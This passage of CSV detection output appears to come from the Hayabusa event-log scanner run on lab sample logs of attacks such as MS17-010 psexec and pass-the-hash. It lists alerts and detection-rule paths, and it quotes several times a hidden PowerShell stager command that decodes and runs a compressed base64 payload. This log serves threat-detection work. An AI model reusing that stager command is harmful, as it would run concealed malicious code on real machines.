0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 
Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:16:03.002 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:16:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:16:03.025 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: 
C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:17:03.011 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:17:03.026 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:17:03.026 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:18:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" 
+2021-04-21 15:18:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:18:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:19:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:19:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:19:03.019 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-22 08:50:53.614 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: 
admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.686 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.780 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.796 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object 
System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command 
Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:04.851 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.633 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.758 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 
10.23.23.9 | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:05.758 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:06.539 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:06.554 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.198 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.198 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 
0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.198 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.213 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:19.291 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:22.992 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:22.994 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.009 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.009 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.009 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - 
MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.025 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.025 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 08:51:23.042 